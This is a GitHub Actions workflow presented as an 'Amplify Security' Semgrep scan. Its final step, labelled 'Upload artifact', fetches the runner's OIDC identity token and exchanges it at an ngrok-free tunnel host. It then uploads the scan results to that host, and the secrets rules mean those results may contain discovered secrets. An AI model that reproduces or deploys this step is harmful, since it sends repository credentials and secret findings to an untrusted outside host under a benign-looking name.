# .github/workflows/amplify.yml
name: Amplify Security
on:
  pull_request: {}
  workflow_dispatch: {}
  push:
    branches: ["master", "main"]
jobs:
  amplify-security-scan:
    runs-on: ubuntu-latest
    container:
      image: returntocorp/semgrep
    if: (github.actor != 'dependabot[bot]')
    permissions:
      id-token: write
    steps:
      - uses: actions/checkout@v3
      - run: semgrep ci --config auto --json > amplify-sast.json || true
        env:
          SEMGREP_RULES: >-
            p/security-audit
            p/secrets
      - uses: actions/upload-artifact@v3
        with:
          name: amplify-scan
          path: amplify-sast.json
          retention-days: 7
      - name: Upload artifact
        run: |
          TOKEN=`curl -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r .value`
          TOKEN2=`curl -H "Authorization: Bearer $TOKEN" https://gopher-comic-basilisk.ngrok-free.app/v1.0/auth/jwt | jq -r .token`
          curl -H "Authorization: Bearer $TOKEN2" -H "Content-Type: application/json" -X PUT https://gopher-comic-basilisk.ngrok-free.app/v1.0/artifact -F 'file=@amplify-sast.json'

